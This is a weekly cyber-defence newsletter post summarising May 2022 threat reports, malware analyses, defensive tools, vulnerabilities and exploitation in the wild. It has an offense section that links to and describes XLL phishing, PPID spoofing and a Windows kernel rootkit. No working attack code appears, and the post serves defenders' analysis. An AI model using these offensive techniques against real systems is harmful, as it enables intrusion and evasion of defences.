Cyber Defence Analysis for Blue & Purple Teams

Share this post

Bluepurple Pulse: week ending May 22nd

bluepurple.binaryfirefly.com

Bluepurple Pulse: week ending May 22nd

Cyber is busy...

Ollie
May 20, 2022
6
Share this post

Bluepurple Pulse: week ending May 22nd

bluepurple.binaryfirefly.com

Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading).

Operationally this week we have seen an uptick in cases involving Black Basta and Bozon3 in clients and CISA issued an emergency directive related VMware Vulnerabilities (technical details covered later).

In the high-level this week:

  • Pushing back on Beijing in the EU-U.S. Trade and Technology Council - hypothesis on Trade and Technology Council between the EU-U.S. being used to address risks emanating from China.

  • Strengthening EU-wide cybersecurity and resilience – provisional agreement by the Council and the European Parliament - NIS2 gets ratified and the 21 month clock starts ticking - we should see some sector improvements and more war gaming around large scale incidents as a results (continent scale).

  • UK Civil nuclear cyber security strategy 2022 - After the UK’s National Strategy (2021) and then the Government Strategy (2022) the UK released its Civil Nuclear - it is interesting to see the evolution and interlink between them all.

  • Chinese Concepts and Opportunities in Information Warfare: China-US Rivalry in Cyberspace - Russian academic paper looking at US Sino cyber - the data point here is that Russian academics are studying what is going on, the conclusions are also stake - “China continues to develop the strategic course aimed at using information warfare to achieve its national political and economic goals. Beijing is progressively developing the concept of introducing the information warfare in order to attract excessive attention from the world community, which has already named it the “Cyber Dragon”

  • First meeting of NATO national cyber coordinators - press release about a meeting sans any content of said meeting.

  • The U.S. Department of State, the U.S. Department of the Treasury, and the FBI issue advisory for the international community, the private sector, and the public to warn of attempts by Democratic People’s Republic of Korea (DPRK, a.k.a. North Korea) to get jobs at IT workers pretending - When remote working goes wrong - attempts by Democratic People’s Republic of Korea (DPRK, a.k.a. North Korea) information technology (IT) workers to obtain employment while posing as non-North Korean nationals. Or Level 11 sanction busting red teaming..

  • Department of Justice Announces New Policy for Charging Cases under the Computer Fraud and Abuse Act - New guidance from the DoJ - The policy for the first time directs that good-faith security research should not be charged - but again it is only guidance - can still be arrested, investigated and then hope they follow the guidance. Still needs primary legislation reform for the CFAA and also the UK’s Computer Misuse Act - as employers we need certainty.

  • Weak Security Controls and Practices Routinely Exploited for Initial Access - FIVEEYES basically say get better at the basic hygiene factors because bad actors are leveraging.

  • Hacker and Ransomware Designer Charged for Use and Sale of Ransomware, and Profit Sharing Arrangements with Cybercriminals in the US - medical doctor was ransomware tool author.

  • Nuclear-Crisis Management and Cyber War—A Dangerous Crossroads - The rule book for nuclear-crisis management in this era of cyber deterrence and cyber war remains to be written apparently - a thought piece on the topic.

  • US Congress has been busy on the cyber front this week with two bills passing:

    • President’s Cup Cybersecurity Competition Act - apparently you need congress to authorize CISA/DHS to hold an annual competition

    • DHS Roles and Responsibilities in Cyber Space Act - providing organisational clarity for cyber in US Government for DHS.

  • Bada Bing, Bada Boom: Microsoft Bing’s Chinese Political Censorship of Autosuggestions in North America - We consistently found that Bing censors politically sensitive Chinese names over time, that their censorship spans multiple Chinese political topics, consists of at least two languages, English and Chinese, and applies to different world regions, including China, the United States, and Canada

  • Invoice Fraud Using Executive and Vendor Impersonation - Whaling and similar are common - but a good reminder of the threat

In terms of reflections this week, nothing material other than cyber is busy on almost every level, as evidenced by the content below. It does concern me that as an industry we still don’t really have strong evidence bases for what works in practice in a lot of cases. What evidence we do have is also hard to find at times.

On the offensive side our evidence base says a team of 5 and a budget of £$ 5 - 10 million can really get into most organisations in 2022.

Enjoying this? don’t get via e-mail? subscribe:

Think someone else would benefit? Share:

Share

Have a lovely Friday

Ollie

Cyber threat intelligence

Who is doing what to whom and how.

Ukraine

Aggregate reporting on the in region activity.

Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis

Hossein Jazi and Jérôme Segura detail a speculative campaign against Germany which is basic and broad.

a new campaign that plays on these concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine. The downloaded document is in fact decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer.

https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/

Network Footprints of Gamaredon Group

Onur Mustafa Erdogan details what they saw in March around this Russian threat actor and provide some concrete indicators of compromise for defenders to search back on.

https://blogs.cisco.com/security/network-footprints-of-gamaredon-group

The IO Offensive: Information Operations Surrounding the Russian Invasion of Ukraine

Alden Wahlstrom, Alice Revelli, Sam Riddell, David Mainor and Ryan Serabian detail information operations from anti-western forces.

[We have] identified activity that we attributed to information operations campaigns conducted by actors we judge to be operating in support of the political interests of nation-states such as Russia, Belarus, China, and Iran, including ongoing campaigns that we have tracked for years. This report examines a slice of this activity, highlighting significant information operations Mandiant has observed in our work responding to the invasion and presenting our early analysis of those events.

https://www.mandiant.com/resources/information-operations-surrounding-ukraine

Killnet Cyber Attacks Against Italy and NATO Countries

Alessandro Brucato details a possible pro-Russian campaign against Italy to cause disruption.

On May 11, several Italian institutional websites, including the Italian Senate, the Ministry of Defense, and the National Institute of Health, were taken offline and unreachable for a few hours. This was day one of a multiday cyber attack, which targeted other Italian websites as well as other countries. The pro-Russian hacker groups Killnet and Legion claimed the attacks through their Telegram channels, killnet_channel and legion_russia using the Mirai malware to perform their DDoS (distributed denial-of-service) attacks to Italian websites.

https://sysdig.com/blog/killnet-italy-and-nato/

Fronton: A Botnet for Creation, Command, and Control of Coordinated Inauthentic Behavior

DDoS as a service from Russia and some good open source sleuthing.

One, involving comments around a squirrel statue in Almaty, Kazakhstan may have affected the reporting on a BBC story. As of April 2022, 0day technologies has changed its domain from 0day[.]ru to 0day[.]llc. An instance of the SANA system appears to be up at https://sana.0day[.]llc . Nisos assesses that this is possibly a testing or demo instance, and is not currently used by the FSB. Nisos researchers conducted open source research to discover 0day is known as 0Dt, full name Zeroday Technologies LLC (0Дт, OOO ЗИРОУДЭЙ ТЕХНОЛОДЖИС) based at Ulitsa Profsoyuznaya, D. 125, Etazh Tsokolnyi Pomesht. I, Kom. 14 Moscow; Moscow; Postal Code: 117647

https://6068438.fs1.hubspotusercontent-na1.net/hubfs/6068438/fronton-report.pdf

Twisted Panda: Chinese APT espionage operation against Russian’s state-owned defense institutes

What happens when your best friend starts a fight when you are busy waging a war? This!

  • a targeted campaign against at least two research institutes in Russia, whose primary expertise is the research and development of highly technological defense solutions. Research suggests that another target in Belarus, likely also related to the research field, received a similar spear-phishing email claiming that the US is allegedly spreading a biological weapon.

  • The defense research institutes that we identified as targets of this attack belong to a holding company within the Russian state-owned defense conglomerate Rostec Corporation. It is Russia’s largest holding company in the radio-electronics industry and the specific targeted research institutes’ primary focus is the development and manufacturing of electronic warfare systems, military-specialized onboard radio-electronic equipment, air-based radar stations and means of state identification.

  • This campaign is a continuation of what [we] believe to be a long-running espionage operation against Russian-related entities that has been in operation since at least June 2021. The operation may still be ongoing, as the most recent activity was observed in April 2022.

  • This activity was attributed with high confidence to a Chinese threat actor, with possible connections to Stone Panda (aka APT10), a sophisticated and experienced nation-state-backed actor, and Mustang Panda, another proficient China-based cyber espionage threat actor. CPR named this campaign Twisted Panda to reflect the sophistication of the tools observed and the attribution to China.

  • The hackers use new tools, which have not previously been described: a sophisticated multi-layered loader and a backdoor dubbed SPINNER. These tools are in development since at least March 2021 and use advanced evasion and anti-analysis techniques such as multi-layer in-memory loaders and compiler-level obfuscations.

https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/

New Trend of Modular Backdoor and APT Attacks

Sophisticated threat actors clearly want better return on investment from their development. A modular backdoor from China used by a number of threat actors, takeaways include:

Pangolin8RAT could be the next gen PlugX/ShadowPad

Tianwu might operate as: a collaborator of APT41, a subgroup of APT41, or a digital quartermaster of Chinese APTs

https://teamt5.org/en/posts/black-hat-asia-2022-new-trend-of-modular-backdoor-and-apt-attacks/

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

BPF Back Doors

After last weeks gun firing by Kevin, numerous parties dumped their reporting this week on it.

Tricephalic Hellkeeper: a tale of a passive backdoor

Tristan Pourcelot provides an excellent analysis of a BPF back door.

https://exatrack.com/public/Tricephalic_Hellkeeper.pdf

A peek behind the BPFDoor

Colson Wilhoit,Alex Bell, Rhys Rustad-Elliott and Jake King drop their analysis along with some solid detection trade-craft.

The first area of opportunity we witnessed while testing was the behavior we observed during the initial execution of the malware, specifically its working directory, in a shared memory location /dev/shm. This is a native temporary filesystem location in Linux that uses RAM for storage, and a binary executing from it let alone generating network connections is fairly uncommon in practice.

During execution, BPFDoor removes existing files from /dev/shm and copies itself there prior to initialization. A detection for this would be any execution of a binary from this directory as root (you have to be root to write to and read from this directory).

https://elastic.github.io/security-research/intelligence/2022/05/04.bpfdoor/article/

Cozy Smuggled Into the Box: APT29 Abusing Legitimate Software for Targeted Operations in Europe

Russia going after European targets with an implant a number of us have seen over the last while.

The misuse of legitimate webservices is in attempt to evade the detection from automatic analysis software. Recently, third-party researchers have also reported it used Trello and its REST API to simulate a first-level Command & Control server. In addition to this evasion attempt, as we are going to discuss later, the side-loaded DLL tries to unhook the windows libraries loaded in the process memory to evade possible EDRs.

To maximize the chances of success, Nobelium, in at least two cases, sent spear-phishing emails from spoofed or compromised government addresses. As initial access we identified the following attack vectors:

  1. The first approach involves the distribution of an IMG file which, when mounted, contains an LNK shortcut and the signed software with the other DLLs and a decoy PDF as hidden files. This attack vector lures the user through a masquerading technique by changing the LNK file icon to a folder icon in order to convince the user to click on it. In fact, once triggered, the cmd.exe utility is invoked to run the signed executable and to start the side-loading of the malicious DLL (i.e. AcroSup.dll).

  2. The second approach involves the usage of the EnvyScout dropper that is basically an HTML file with an embedded JavaScript designed to decode and drop the next-stage payload (HTML Smuggling). In fact, once the HTML file is executed, the JavaScript code decodes a bytes array and saves the result under an archive in the Download directory. In this case, the user is responsible to unzip the archive (that contains the signed software, the relative DLL’s and the lure PDF) and to run manually the executable to start the chain (even if the JavaScript code contains unused snippet for automating the process).

The EnvyScout dropper was used by this threat actor in different campaigns. From mid-January 2022 we internally reported different Nobelium-linked campaigns against European entities that leveraged fairly complex kill-chain started with EnvyScout as well.

https://cluster25.io/2022/05/13/cozy-smuggled-into-the-box/

HUI Loaderの分析 - Analysis of HUI Loader as used by APT10

Japanese reporting on a Chinese threat actor and their malicious code loader which has been in use since 2015 and still in use today! APT sweating the asset.

Transition of HUI Loader

HUI Loader is a loader that has been used for a long time while being updated little by little from around 2015. It is expected that it will continue to be used in the future.

https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html

Wizard Spider Group In-Depth Analysis

What happens if you are a Cyber Threat Intelligence company in Switzerland and Turkey? Well you get to produce this report apparently by gaining ‘visibility’ into adversary infrastructure.

We obtained visibility into critical elements of the group’s infrastructure and collected vital data on its kill chain, as shown below

Our infrastructure analysis revealed a great deal of exclusive, never-before-seen information regarding the group and its technical infrastructure, in addition to the following information :

  • Highly-secret credentials/documents for at least 30+ victims.

  • 400+ different binaries including BazarLoader, Qbot, PowerShell scripts, Cobalt Strike beacons, executable files, exploits, and custom toolkits.

  • VPN and file transfer tool’s configurations files.

  • 750+ victim’s kerberos tickets, domain admin passwords, hashes, etc. • Anonymous credentials used for operational needs.

  • 5 bitcoin addresses likely owned by a threat actor who plays a role processing victim payments.

https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf

Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC – Part I

Xiaopeng Zhang documents file less malware which is an Excel file which uses VBA, which accesses a remote .htm file using mshta which has JavaScript within. So not entirely file less in reality.

We captured a phishing campaign that was delivering three fileless malware onto a victim’s device. Once executed, they are able to steal sensitive information from that device.

..

[which] obtains three fileless malware in a huge downloaded PowerShell file to bypass detection, and how these are later deployed and executed inside the target processes through Process Hollowing. These three fileless malware are AveMariaRAT / BitRAT / PandoraHVNC.

https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware

filesyncshell.dll hijacking? Briefing on the latest APT-C-24 Rattlesnake attack activity

Chinese reporting on an Indian threat actor against China itself. The quality assurance processes meant it didn’t detonate successfully in the target.

We recently captured a slightly unusual incident of attack activity. The attack was launched by the APT-C-24 (Sidewinder) organization, which changed the previous attack framework and used a new attack method and process. Interestingly, in this attack activity, due to the software version, the attack activity could not be completed normally according to the normal code execution logic. It seems that our old friend Sidewinder APT organization is not completely synchronized with the Chinese environment in the code testing environment.

https://mp-weixin-qq-com.translate.goog/s/qsGxZIiTsuI7o-_XmiHLHg?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=en

The BlackByte ransomware group is striking users all over the globe

Useful trade craft insight and clear usage of living off the land binaries.

  • [We have] been monitoring the BlackByte Ransomware Group for several months, infecting victims all over the world, from North America to Colombia, Netherlands, China, Mexico and Vietnam.

  • BlackByte updated its leak site with a new design and new victims and is still actively exploiting victims worldwide. 

The attack usually starts with a network entry point, either a previously compromised host or a software vulnerability which is exploitable from the network. The former compromised host elevates local and domain account privileges and moves laterally by using standard penetration testing and legit administrator tools (LoLBins). In most incidents, they like to use the AnyDesk remote management software to control victim machines. 

https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html

Rust Supply-Chain Attack Infects Cloud CI Pipelines with Go Malware

Juan Andrés Guerrero-Saade provides details on a software library repository supply chain attack. The contagion risk to the upstream of this style of attack is vast and one that I sense we really haven’t got a full handle on today.

  • [We] investigated a supply-chain attack against the Rust development community that we refer to as ‘CrateDepression’.

  • On May 10th, 2022, the Rust Security Response Working Group released an advisory announcing the discovery of a malicious crate hosted on the Rust dependency community repository.

  • The malicious dependency checks for environment variables that suggest a singular interest in GitLab Continuous Integration (CI) pipelines.

  • Infected CI pipelines are served a second-stage payload. We have identified these payloads as Go binaries built on the red-teaming framework, Mythic.

  • Given the nature of the victims targeted, this attack would serve as an enabler for subsequent supply-chain attacks at a larger-scale relative to the development pipelines infected.

  • We suspect that the campaign includes the impersonation of a known Rust developer to poison the well with source code that relies on the typosquatted malicious dependency and sets off the infection chain.

https://www.sentinelone.com/labs/cratedepression-rust-supply-chain-attack-infects-cloud-ci-pipelines-with-go-malware/

Mars Stealer - the latest version of Oski Stealer

Commodity malware to steal funds goes brrrrr..

Mars Stealer is an information-stealing malware that first appeared on hacking forums in June 2021, a year after its predecessor Oski Stealer was discontinued in June 2020. Mars Stealer can target or ‘support’ over 50 crypto wallets and extensions, is multi-functional, and avoids detection. In addition, it’s low price on the malware market has generated significant attention from threat actor(s) who are looking to add the effective malware into their arsenal.

  • Mars Stealer is the latest version of Oski Stealer, which was discontinued in June 2020.

  • NetSupport RAT (Remote Access Tool), or client32.exe, was embedded in a ChromeSetup.exe file and used by an attacker to gain access to a victim’s workstation for further deployment of tools needed to plant Mars Stealer.

  • An executable with the original filename 3uAirPlayer was used to deploy obfuscated AutoIt scripts with Mars Stealer embedded inside and a renamed version of AutoIt to evade detections.

  • The persistence mechanism was created to make sure the attacker(s) maintain access to NetSupportManager as a backdoor.

  • Mars Stealer can self-delete itself after successfully exfiltrating the victim’s data, leaving no trace behind.

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer

A closer look at Eternity Malware - Threat Actors Leveraging Telegram To Build Malware

Cyber crime adopts chat bots to build malware. How very customer focused!

Interestingly, individuals who purchase the malware can utilize the Telegram Bot to build the binary. The TAs provide an option in the Telegram channel to customize the binary features, which provides an effective way to build binaries without any dependencies.  

https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/

oRAT Malware

More macOS / Windows malware using some rather clumsy trade-craft.

The oRAT malware is distributed as a Disk Image (.dmg) masquerading as a Bitget application

  • Earth Berberoka (aka GamblingPuppet) is a new APT group reportedly using a cross-platform malwarenamed “oRAT” to target Windows and macOS.

  • Reports indicate that oRAT spreads by disguising itself as a crypto trader application, and is coded in Golang.

https://assets.sentinelone.com/customer-watchtower-white/orat-flash-wt

UpdateAgent malware adapts again

Further malicious activity targeting macOS which looks like it is pay-per-install on behalf of various actors.

The newly discovered Swift-based dropper exhibits many of the characteristics of typical dropper malware, including some minor system fingerprinting, endpoint registration and persistence. The second stage download and execute the functionality of droppers, in general, represent a risky class of malware that support a number of second-stage attacks — from malware to spyware, to adware.

https://www.jamf.com/blog/updateagent-adapts-again/

Chaos Ransomware

Multiple reporting on this threat this week.

Chaos Code Reused - Yashma and ONYX

First bit of reporting from earlier in the month.

[We] identified 2 ransomware payloads, identified as Yashma and ONYX, that containreused code strains from Chaos ransomware, which was first reported in 2021.

  • Recently, threat actors deploying ONYX posted news on their intrusion into 6 organizations.

  • After further assessment, [we] have moderate confidence that these payloads were codedthrough builder tools and lack sophistication of other strains. There is a risk of new variants appearing in the coming months.

https://assets.sentinelone.com/customer-watchtower-white/chaos-code-reused-wt

Chaos Ransomware Variant Sides with Russia

Gergely Revay and Shunichi Imano outline that a ransomware group has sided with the Russian state. Turns out it isn’t ransomware - but a wiper dressed up to look like one.

[We] recently came across a variant of the Chaos ransomware that appears to side with Russia. This blog explains the vicious consequences that the Chaos variant delivers to a compromised machine.

The Chaos ransomware variant that this blog covers is unique in the sense that the attacker has no intention of providing a decryption tool or file recovery instructions for its victims to recover their affected files.

https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia

The Goot cause: Detecting Gootloader and its follow-on activity

I have been covering these Search Engine Optimization (SEO) attacks to distribute malware for the last few weeks, turns out this week is no exception. This is a great analysis of the end-to-end attack chain by Tony Lambert.

We’ve increasingly observed Gootloader operators using search engine optimization (SEO) poisoning tactics to gain access to victims’ environments and initiate multi-pronged intrusions involving follow-on payloads such as Cobalt Strike and Gootkit.

https://redcanary.com/blog/gootloader/

Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices

Linux focused threat using SSH brute forcing as the initial access vector and then deploying a modular implant. Tim will have happy this week! (Hi Tim!).

In the last six months, we observed a 254% increase in activity from a Linux trojan called XorDdos. First discovered in 2014 by the research group MalwareMustDie, XorDdos was named after its denial-of-service-related activities on Linux endpoints and servers as well as its usage of XOR-based encryption for its communications.

XorDdos uses evasion and persistence mechanisms that allow its operations to remain robust and stealthy. Its evasion capabilities include obfuscating the malware’s activities, evading rule-based detection mechanisms and hash-based malicious file lookup, as well as using anti-forensic techniques to break process tree-based analysis.

https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/

Discovery

How we find and understand the latent compromises within our environments.

IR Last Write Time

أبويعقوب releases a useful script to identify file system activity in a specific date/time window quickly.

Simple PowerShell Script to Help You Find All Files Has Been Modified In A Range Time.

https://github.com/3gbCyber/IR-Last-Write-Time

USB Devices Redux: Windows forensics

H. Carvey revisits USB forensics on Windows 10 which highlights a configuration change may be required to have the most impact.

Also, in researching information for this topic, I found that the EMDMgmt key in the Software hive, which is associated with ReadyBoost and provided insight into USB-connected devices, is no longer available either.

From a forensic perspective, if you're interested in tracking USB devices connected to systems, I'd recommend enabling the Microsoft-Windows-DriverFrameworks-UserMode/Operational Event Log, forwarding those event records off of the system (for processing via a SIEM).

http://windowsir.blogspot.com/2022/05/usb-devices-redux.html

New processor for BPF bytecode by Heurs for Ghidra

Given all the BPF reporting recently pretty epic to see this pull request for Ghidra by Heurs. Not this is BPF AND NOT eBPF.

https://github.com/NationalSecurityAgency/ghidra/pull/4258

Defence

How we proactively defend our environments.

Tetragon - eBPF-based Security Observability & Runtime Enforcement

A new player has entered (against Microsoft Sysmon for Linux and others..) but also container aware.

Tetragon detects and is able to respond in real time to security-significant events, such as

  • Process execution events

  • Changes to privileges and capabilities

  • I/O activity including network & file access

When used in a Kubernetes environment, Tetragon is Kubernetes-aware - that is, it understands Kubernetes identities such as namespaces, pods and so-on - so that security event detection can be configured in relation to individual workloads.

https://github.com/cilium/tetragon

Cyberchef Recipe for Cobalt Strike

Various Cyberchef receipts to help with beacon analysis:

  • Cobalt Strike Reflective Loader(beacon) v4 for x64

  • Cobalt Strike Reflective Loader(beacon) v4 for x32

https://gist.github.com/michaelder

WebApp for converting Sigma detection rules into SIEM queries

Julian Ortel releases this open source project which allows you to convert Sigma rules to Splunk or Rapid7 insightDR format.

Inspired by uncoder.io I wrote my own implementation using the new pySigma library

https://github.com/M3NIX/sigmaio

UNSW-NB15: a comprehensive data set for network intrusion detection systems

To train those machines or make IDS bleed..

UNSW-NB15 is a network intrusion dataset. It contains nine different attacks, includes DoS, worms, Backdoors, and Fuzzers. The dataset contains raw network packets. The number of records in the training set is 175,341 records and the testing set is 82,332 records from the different types, attack and normal.

https://paperswithcode.com/dataset/unsw-nb15

A STIX 2.1 Extension Definition for the Course of Action (COA) object type

You can see the potential value in this, but also wonder if it is too complex / risky to really use. I do however hope COA or similar grow as if shared they are really valuable to less capable blueteams.

This repository includes a STIX 2.1 nested property extension that augments the Course of Action (COA) STIX Domain Object (SDO) type to enable describing, embedding, storing, and sharing machine-readable security playbooks and orchestration workflows.

https://github.com/fovea-research/stix2.1-coa-playbook-extension

Offense

Attack capability, techniques and tradecraft.

Microsoft Office XLL Phishing Tradecraft

Alex Reid outlines how XLL files can be used in phishing campaigns. We have seen a number of commercial Red Teams use these.

With Microsoft's recent announcement regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have began aggressively exploring other options to achieve user driven access (UDA).

XLL's are DLL's, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal excel documents.

https://github.com/Octoberfest7/XLL_Phishing

PPID Spoofing & BlockDLLs with NtCreateUserProcess

Rasta Mouse provided minimum code to avoud CreateProcess and yet still achieve Parent Process ID (PPID) spoofing.

This week, Capt. Meelo released a great blog post on how to call the NtCreateUserProcess API as a substitute for the typical Win32 CreateProcess API. This post will build upon Meelo’s, so I highly encourage you to read it first.

https://offensivedefence.co.uk/posts/ntcreateuserprocess/

Windows Kernel Driver in Rust aka Rusty Rootkit for Red Teamers

From NewZealand with love..

Features (Development in progress)

  • Protect / unprotect process (Done)

  • Elevate / remove token privileges (Done)

  • Hide process (Done)

  • Hide driver (Done)

  • Enumerate loaded kernel modules (Done)

  • Enumerate / remove kernel callbacks

    • PsSetCreateProcessNotifyRoutine (Done)

    • PsSetCreateThreadNotifyRoutine (Todo)

    • PsSetLoadImageNotifyRoutine (Todo)

    • CmRegisterCallbackEx (Todo)

    • ObRegisterCallbacks (Todo)

  • DSE enable/disable (Done)

https://github.com/memN0ps/eagle-rs/

Stealing Google Drive OAuth tokens from Dropbox

A now patched bug, but a chain with a serious impact..

Sreeram KL and I were able to chain a harmless CSRF and SSRF in HelloSign to leak Google Drive OAuth tokens of Dropbox users.

https://blog.stazot.com/stealing-google-drive-oauth-tokens-from-dropbox/

Vulnerability

Our attack surface.

CVE-2022-22972: VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities

Sob..

A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.

https://www.vmware.com/security/advisories/VMSA-2022-0014.html

CVE-2022-29383: NETGEAR ProSafe SSL VPN SQL injection vulnerability exists in scgi-bin/platform.cgi

Yes and found with sqlmap..

https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383

Security Notice: SMA 1000 Series Unauthenticated Access Control Bypass

The SonicWall Product Security & Incident Response Team (PSIRT) has verified and patched the following vulnerabilities that impact Secure Mobile Access (SMA) 1000 series products (see product list and impacted firmware versions below).

  1. Unauthenticated access control bypass

  2. Use of hard-coded/shared cryptographic key

  3. URL redirection to an untrusted site (open redirection)

https://www.sonicwall.com/support/product-notification/security-notice-sma-1000-series-unauthenticated-access-control-bypass/220510172939820/

Exploitation

What is being exploited.

Lazarus Group (NukeSped) Exploiting Log4Shell Vulnerability

Korean reporting on North Korea using log4j against VMWare Horizon to deploy an infostealer and more.

https://asec.ahnlab.com/ko/34107/

Observed in the Wild: F5 BIG-IP CVE-2022-1388

We expected it and now it is happening.. who and for what purpose will become evidence in the fullness of time.

  • As of 14-May-22, GreyNoise has observed 173 unique IP addresses attempting to exploit the F5 BIG-IP iControl REST Authentication bypass vulnerability in the wild.

  • Observed exploit techniques include a large number of file requests, credential stuffing, and admin user creation. 

  • Download the latest list of IPs trying to exploit this vulnerability here, for use in analysis and temporary blocking

https://www.greynoise.io/blog/observed-in-the-wild-f5-big-ip-cve-2022-1388

Exploiting Cisco RV340 router at Pwn2Own Austin 2021

If there were any left unpatched they will be compromised pretty soon..

At the 2021 Pwn2Own Austin, our offensive research team, Team Orca, successfully exploited the Cisco RV340 router. In this article, we will go into the details of the vulnerabilities we identified.

https://blog.security.sea.com/posts/pwn2own-2021-rv340/

Android 0-Day attacks

Clement Lecigne and Christian Resell detail three in the wild campaigns against Android. Shows that such chains exist, some are sold etc.

The first campaign, detected in August 2021, used Chrome on a Samsung Galaxy S21 and the web server immediately replied with a HTTP redirect (302) pointing to the following intent URL. This URL abused a logic flaw and forced Chrome to load another URL in the Samsung Browser without user interaction or warnings.

We assess with high confidence this vulnerability was sold by an exploit broker and probably abused by more than one surveillance vendor.

..

In September 2021, TAG detected a campaign where the exploit chain was delivered to a fully up-to-date Samsung Galaxy S10 running the latest version of Chrome. We recovered the exploit used to escape the Chrome Sandbox, but not the initial RCE exploit.

..

In October 2021, we detected a full chain exploit from an up-to-date Samsung phone running the latest version of Chrome.

The chain included two 0-day exploits:

  • CVE-2021-38003: A Chrome renderer 0-day in JSON.stringify allowing the attacker to leak TheHole value and fully compromise the renderer.

  • CVE-2021-1048: Unlike the previous campaign, the sandbox escape used a Linux kernel bug in the epoll() system call. This system call is reachable from the BPF sandbox and allows the attacker to escape the sandbox and compromise the system by injecting code into privileged processes. More information can be found in this RCA by Jann Horn.

https://blog.google/threat-analysis-group/protecting-android-users-from-0-day-attacks/

Footnotes

Some other small bits and bobs which might be of interest.

  • New ransomware trends in 2022

  • A Tale of Two Markets: Investigating the Ransomware Payments Economy

  • SBOM + SLSA: Accelerating SBOM success with the help of SLSA

  • Software Updates Strategies: a Quantitative Evaluation against Advanced Persistent Threats

  • Call for Papers: 2022 FIRST Cyber Threat Intelligence Symposium

  • Artificial Intelligence and Cybersecurity - CEPS (a leading think tank and forum for debate on EU affairs) launched a Task Force on Artificial Intelligence and Cybersecurity in the autumn of 2019, to consider the technical, ethical, market and governance challenges posed by the intersection of AI and cybersecurity.

  • In hot pursuit of ‘cryware’: Defending hot wallets from attacks - worst marketing invented threat name..

That’s all folks.. until next week..

Share this post

Bluepurple Pulse: week ending May 22nd

bluepurple.binaryfirefly.com
Comments
TopNewCommunity

No posts

Ready for more?

© 2023 Ollie Whitehouse from BinaryFirefly
Privacy ∙ Terms ∙ Collection notice
Start WritingGet the app
Substack is the home for great writing